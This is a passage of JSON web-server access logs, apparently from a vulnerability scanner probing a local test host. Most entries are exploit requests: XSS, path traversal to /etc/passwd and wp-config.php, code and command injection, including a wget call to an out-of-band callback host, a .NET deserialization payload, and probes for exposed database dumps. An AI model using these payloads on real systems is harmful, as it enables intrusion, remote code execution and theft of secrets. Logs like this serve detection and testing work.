HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.prod.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/calendar/agenda_list.php?type=xss\x22+onmouseover=alert(document.domain)+\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"{\x22Type\x22:\x22SubscriptionConfirmation\x22,\x22Message\x22:\x22\x22,\x22SubscribeURL\x22:\x22https://rfi.nessus.org/rfi.txt\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\x0D\x0AdataBlockSize=64\x0D\x0Atimeout=1\x0D\x0AnumberOfRepetitions=4\x0D\x0Ahost=$(echo 127.0.0.1; wget http://ca28bc0smpvbbtig07h0mu7izxykwmjnd.oast.pro)\x0D\x0AX_TP_ConnName=ewan_ipoe_d\x0D\x0AdiagnosticsState=Requested","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/targets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"step=1&Language=de{${system(\x22ls\x22)}}&NextBtn=Weiter+%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mailingupgrade.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/spec/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/sdcall/Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.production.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi?7 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/mainFrame.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbdump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin-ng/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:02 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFz